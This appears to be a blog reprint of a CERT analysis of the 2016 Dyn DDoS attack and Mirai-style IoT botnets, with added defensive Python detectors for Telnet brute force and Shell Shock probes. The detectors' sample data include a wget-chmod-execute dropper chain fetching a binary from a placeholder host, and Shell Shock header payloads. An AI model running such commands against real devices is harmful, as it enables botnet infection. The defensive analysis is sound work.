CERT Analysis on IoT Botnet and DDoS Attacks

On October 21, 2016, a DDoS attack hit the DNS service provider Dyn. The company is a major DNS provider for many companies in the United States.

On the morning of the attack, Dyn confirmed that its DNS infrastructure on the East Coast was under DDoS attack from sources all over the world. The attacks severely affected the business of Dyn’s DNS customers, and even worse, those customers’ websites became inaccessible. The attacks lasted until 13:45 ET. Dyn said on its official website that it would investigate the issue and publish an incident report.

Services affected by this attack included Twitter, Etsy, Github, Soundcloud, Spotify, Heroku, PagerDuty, Shopify, and Intercom. Access to popular websites like PayPal, BBC, Wall Street Journal, Xbox, CNN, HBO Now, Starbucks, New York Times, The Verge, and Financial Times was also affected.

Initial Analysis of the Attack

Dyn said that this DDoS attack involved tens of millions of IP addresses, most of which belonged to IoT and smart devices. Dyn believed that the attack came from a malicious code named “Mirai.” The hacker groups NewWorldHackers and Anonymous claimed responsibility for the attack.

CERT Analysis on Botnets

| Family | Variant quantity | Sample HASH quantity |
|---|---|---|
| Trojan[DDoS]/Linux.Mirai | 2 | Greater than 100 |
| Trojan[DDoS]/Linux.Xarcen | 5 | Greater than 1000 |
| Trojan[DDoS]/Linux.Znaich | 3 | Greater than 500 |
| Trojan/Linux.PNScan | 2 | Greater than 50 |
| Trojan[Backdoor]/Linux.Mayday | 11 | Greater than 1000 |
| Trojan[DDoS]/Linux.DnsAmp | 5 | Greater than 500 |
| Trojan[Backdoor]/Linux.Ganiw | 5 | Greater than 3000 |
| Trojan[Backdoor]/Linux.Dofloo | 5 | Greater than 2000 |
| Trojan[Backdoor]/Linux.Gafgyt | 28 | Greater than 8000 |
| Trojan[Backdoor]/Linux.Tsunami | 71 | Greater than 1000 |
| Worm/Linux.Moose | 1 | Greater than 10 |
| Worm[Net]/Linux.Darlloz | 3 | Greater than 10 |

In this incident, the primary victims infected with Mirai were IoT devices, including routers, network cameras, and DVRs. As early as 2013, organizations engaged in DDoS cyber crime started to shift their targets for capturing botnet hosts from Windows to Linux, and from x86 Linux servers to IoT devices running embedded Linux. Mirai means “future” in Japanese; R&D staff have named a new variant “Hajime,” which means “beginning” in Japanese.

CERT has captured and analyzed a large number of malicious samples related to smart devices and routers, and has worked with the relevant authorities to collect field evidence from some devices. These devices mainly use the MIPS and ARM architectures, and attackers implanted Trojans on them by exploiting default passwords, weak passwords, and serious vulnerabilities that were not fixed in time. Because IoT devices are mass-produced and mass-deployed, and integrators and O&M staff in many application scenarios lack sufficient competence, a significant proportion of devices still use default passwords, and vulnerabilities do not get fixed in time.

Mode of the Attack

In the IoT-targeting DDoS botnets (including Mirai), attackers brute-force the Telnet port using lists of popular passwords, or log on with the device’s default password. Once logged on through Telnet, they use the embedded tools normally present on the device, such as BusyBox and wget, to download the DDoS bot, set its executable attribute, run it, and take control of the device. Because CPU instruction set architectures differ, some botnets first determine the device’s architecture and then select a MIPS, ARM, or x86 sample for downloading. Once the sample is running, the bot receives attack commands from its controller and launches attacks.
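The infection chain described above (Telnet brute force, then download, chmod, execute) leaves a recognizable trace in Telnet honeypot or device session logs. The following detector is an added example written for this article and is not code from the report or from CERT’s Beeswarm system; the log format, the source addresses (documentation ranges 198.51.100.0/24 and 203.0.113.0/24) and the session contents are constructed, and the thresholds are assumptions.

```python
"""Flag Telnet brute-force bursts and the download -> chmod -> execute
dropper chain in constructed honeypot session logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not captured data); one event per line.
SAMPLE_LOG = """\
2016-10-20T08:12:01Z src=198.51.100.7 event=login_failed user=root
2016-10-20T08:12:02Z src=198.51.100.7 event=login_failed user=root
2016-10-20T08:12:03Z src=198.51.100.7 event=login_failed user=admin
2016-10-20T08:12:04Z src=198.51.100.7 event=login_failed user=admin
2016-10-20T08:12:05Z src=198.51.100.7 event=login_failed user=support
2016-10-20T08:12:09Z src=198.51.100.7 event=login_ok user=admin
2016-10-20T08:12:10Z src=198.51.100.7 event=cmd text="/bin/busybox wget http://203.0.113.5/bins/mips -O /tmp/x"
2016-10-20T08:12:11Z src=198.51.100.7 event=cmd text="chmod +x /tmp/x"
2016-10-20T08:12:12Z src=198.51.100.7 event=cmd text="/tmp/x"
2016-10-20T08:15:00Z src=198.51.100.9 event=login_failed user=root
2016-10-20T08:20:00Z src=198.51.100.9 event=login_ok user=root
2016-10-20T08:20:05Z src=198.51.100.9 event=cmd text="cat /proc/cpuinfo"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) src=(?P<src>\S+) event=(?P<event>\S+)'
    r'(?: user=(?P<user>\S+))?(?: text="(?P<text>[^"]*)")?$')

DOWNLOAD_TOOLS = ("wget", "tftp", "curl", "ftpget")   # assumed tool names
CHMOD_RE = re.compile(r'\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\s+(\S+)')
OUTPUT_RE = re.compile(r'-O\s+(\S+)')                  # wget -O <path>


def parse_log(text):
    """Turn log lines into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(d)
    return events


def find_bruteforce(events, threshold=5, window_seconds=60):
    """Sources with >= threshold failed logins inside a sliding window."""
    failures = defaultdict(list)
    for e in events:
        if e["event"] == "login_failed":
            failures[e["src"]].append(e["ts"])
    window = timedelta(seconds=window_seconds)
    flagged = []
    for src, times in failures.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                flagged.append(src)
                break
    return flagged


def find_dropper_chains(events):
    """Per source: after login_ok, track download -> chmod -> execute of
    the same file and return the furthest stage reached."""
    state, results = {}, {}
    for e in events:
        src = e["src"]
        if e["event"] == "login_ok":
            state[src] = {"stage": "login", "path": None}
            continue
        if e["event"] != "cmd" or src not in state:
            continue
        st, text = state[src], e["text"]
        tokens = text.split()
        if st["stage"] == "login" and any(t in DOWNLOAD_TOOLS for t in tokens):
            m = OUTPUT_RE.search(text)
            st["path"] = m.group(1) if m else None
            st["stage"] = "download"
        elif st["stage"] == "download":
            m = CHMOD_RE.search(text)
            if m and (st["path"] is None or m.group(1) == st["path"]):
                st["path"], st["stage"] = m.group(1), "chmod"
        elif st["stage"] == "chmod" and tokens and tokens[0] == st["path"]:
            st["stage"] = "execute"
        results[src] = st["stage"]
    # Sessions that only logged in and ran ordinary commands are not reported.
    return {s: stage for s, stage in results.items() if stage != "login"}


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print("brute force:", find_bruteforce(evs))
    print("dropper chains:", find_dropper_chains(evs))
```

The two checks are deliberately separate: a burst of failed Telnet logins is an early-warning signal even when no login succeeds, while the download/chmod/execute sequence after a successful login is the high-confidence indicator that a bot was actually dropped, and the stage reached tells the responder how far the infection got.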

The following weak passwords can exist in a Mirai sample:

In previous tracking and analysis of IoT botnets, CERT found that many popular DVR, network camera, and smart router brands had the default password problem.

Analysis of the Mirai Botnet

CERT analyzed the Mirai source code uploaded to GitHub on October 4, 2016, and sorted out its code structure:

The leaked Mirai source code mainly consists of two parts:

  1. Loader: The loader stores the executable files compiled for each platform and is used to load the actual Mirai attack program.
  2. Mirai: Mirai is the program that hackers use to carry out the attack. It has two parts: bot (the controlled end, written in C) and cnc (the control end, written in Go).

The following modules are available at the bot end:

| Module file name | Module function |
|---|---|
| attack.c | Used for attacks. The called attack sub-modules are defined in the other attack_xxx.c files. |
| checksum.c | Calculates checksums. |
| killer.c | Ends (kills) processes. |
| main.c | Main module; calls the other sub-modules. |
| rand.c | Generates random numbers. |
| resolve.c | Resolves domain names. |
| scanner.c | Scans the network for devices that can be attacked, for example by using weak passwords. |
| table.c | Stores encrypted domain name data. |
| util.c | Provides some utility functions. |

Releasing such code as “open source” sets an extremely bad example and further reduces the cost for other attackers of attacking IoT devices. Therefore, this article does not interpret the code.

CERT’s Monitoring on IoT Botnets

| Attack start time and end time | Sample family (named by the original factory) | Attack target | Attack type |
|---|---|---|---|
| 2016-10-22 9:36:48 | Family Mayday | 203.195..:15000 Guangzhou Tencent | tcp flood |
| 2016-10-20 8:12:57 | Family DDoS | www.52*.com XXX | |
| 2016-10-20 1:36:20 | Family DDoS | www.ssh*.com/user.php Shenzhen XXX company | |
| 2016-10-9 18:52:35 | Family Billgates | 121.199.. Hangzhou XX cloud | |
| 2016-9-5 10:57:00 | Family Billgates | 59.151.. Beijing XX | |

Before 2014, attackers mostly scanned for weak passwords to implant malicious code on Linux-based IoT devices. Since the appearance of Shell Shock (CVE-2014-6271), this vulnerability has been commonly used on the Internet to scan for targets and implant malicious code. According to information captured by the CERT Beeswarm system, the number of Linux host intrusion incidents increased significantly after Shell Shock appeared.
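Shell Shock scanning is easy to spot in web or honeypot logs because the exploit must deliver the bash function-definition prefix `() {` inside an HTTP header that a CGI handler exports into the environment. The following checker is an added example written for this article, not code from the report or from the Beeswarm system; the captured-request records and source addresses (documentation range 203.0.113.0/24 and 198.51.100.0/24) are constructed, and the record layout is an assumption.

```python
"""Detect Shell Shock (CVE-2014-6271) probes in captured HTTP requests
(added example over constructed records)."""
import re

# Constructed request records (not real captures). A probe usually puts
# the bash function prefix in a header that CGI scripts export as an
# environment variable, such as User-Agent, Referer or Cookie.
SAMPLE_REQUESTS = [
    {"src": "203.0.113.10",
     "request": "GET /cgi-bin/status.sh HTTP/1.1",
     "headers": {"Host": "router.example",
                 "User-Agent": "() { :;}; /bin/echo probe"}},
    {"src": "203.0.113.11",
     "request": "GET /index.html HTTP/1.1",
     "headers": {"Host": "router.example",
                 "User-Agent": "Mozilla/5.0",
                 "Referer": "() {:; }; /bin/echo probe"}},
    {"src": "198.51.100.4",
     "request": "GET /index.html HTTP/1.1",
     "headers": {"Host": "router.example",
                 "User-Agent": "Mozilla/5.0 (X11; Linux)"}},
]

# The vulnerable bash versions parse any env value starting with "() {"
# as a function definition; whitespace between the tokens is optional.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')


def is_shellshock_probe(value):
    """True if a header value carries the bash function-definition prefix."""
    return bool(SHELLSHOCK_RE.search(value))


def targets_cgi(request_line):
    """True if the request path looks like a CGI handler, where headers
    reach bash via the environment (higher-priority hit)."""
    parts = request_line.split()
    path = parts[1] if len(parts) > 1 else ""
    return "/cgi-bin/" in path or path.endswith((".sh", ".cgi"))


def scan_requests(records):
    """Return one hit per request that carries the probe, listing the
    offending headers and whether the path is a CGI endpoint."""
    hits = []
    for r in records:
        bad = sorted(h for h, v in r["headers"].items() if is_shellshock_probe(v))
        if bad:
            hits.append({"src": r["src"], "headers": bad,
                         "cgi": targets_cgi(r["request"])})
    return hits


if __name__ == "__main__":
    for hit in scan_requests(SAMPLE_REQUESTS):
        print(hit)
```

The `cgi` flag separates noise from real risk: the prefix in a header only becomes a command execution on hosts whose web server hands the header to a vulnerable bash through a CGI-style environment, so a hit against `/cgi-bin/` on an embedded device deserves immediate attention, while the same string against a static page is evidence of scanning activity from that source.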

The first Shell Shock infection incident detected by CERT occurred in September 2014. Later, CERT published multiple malicious code analysis reports related to IoT devices, such as the Analysis of DYREZA Family Variants Spread Using Routers and Hackers Using HFS to Build Servers and Spread Malicious Codes. Another report, the Trojan[DDoS]/Linux.Znaich Analysis Report, was not published at that time and is now appended to this report. Attackers also used a few other vulnerabilities that grant host privileges.

Opinions from the CERT Analysis Team

  1. The number of online IoT devices is increasing substantially with the rapid development of the IoT, ranging from smart homes to smart cities.
  2. Windows is the mainstream desktop operating system. With the continuous enhancement of Windows memory-safety mitigations (such as DEP, ASLR, and SEHOP), it is increasingly difficult to break into a Windows system through a remotely open port. In contrast, injecting malicious code through IoT devices that lack a strict security design has a much higher success rate.
  3. Most IoT devices have no embedded security mechanisms, and many of them are not placed within the traditional IT network; that is, they are beyond the reach of existing security monitoring. Problems on these devices therefore cannot be responded to efficiently as they happen.
  4. IoT devices often stay online 24 hours a day and are therefore more stable attack sources than desktop Windows systems.

CERT has expounded the view that threats will spread and generalize in depth with the development of Internet Plus, and used the term “Malware/Other” to express that security threats are evolving toward new fields such as smart devices. As we feared, security threats are now everywhere, from smart cars, smart homes, and smart wearable devices to smart cities.

Therefore, in this large-scale DDoS incident targeting Dyn’s DNS, CERT attaches more importance to the IoT security problems it exposed. Although DNS is often regarded as the Achilles’ heel of the Internet, we should not forget that interworking on the Internet relies on IP addresses; domain names exist merely to make addresses easier for users to remember. For most users in the large industries of North America, VPNs and IP addresses are widely used for connections, and primary system operation does not rely on the DNS service. Therefore, even though such a heavy-traffic DDoS attack inconveniences netizens accessing websites for a period, it cannot shake the social operation and Internet foundation of North America.

The Importance of Device Security in IoT

Many of the devices on which these applications run are necessary infrastructure devices on critical nodes that sustain people’s livelihoods, or even basic sensors of critical industrial control facilities. Intruding into these devices yields resources of deeper value and is more dangerous than using them to launch DDoS attacks. The wide existence of vulnerabilities across the IoT brings more concealed and more dangerous public security and national security risks, and such threats are difficult to perceive.

It is natural to use public impact as the main indicator for evaluating the severity of cybersecurity incidents. But as security threats gradually become more targeted and more concealed, we should not restrict our focus to risks that are easy to identify; otherwise, more dangerous threats will be let off. Even though the Dyn DDoS attack only affected access to websites, the underlying concept behind the attack can easily be extended to other applications.

CERT has been strengthening the security protection of IoT devices, raising the cost of attacking or intruding into IoT devices, and enhancing security threat monitoring and alerting for IoT devices. This is similar to what we’ve done in the last decade to enable the CERT AVL SDK engine to run on tens of thousands of firewalls and billions of mobile phones.

With advances in technology, the IoT is becoming more secure with the latest monitoring and intrusion prevention systems. CERT is working to win this battle soon and hopes to secure this revolutionary technology completely.

To learn more about IoT and security, visit www.alibabacloud.com/blog.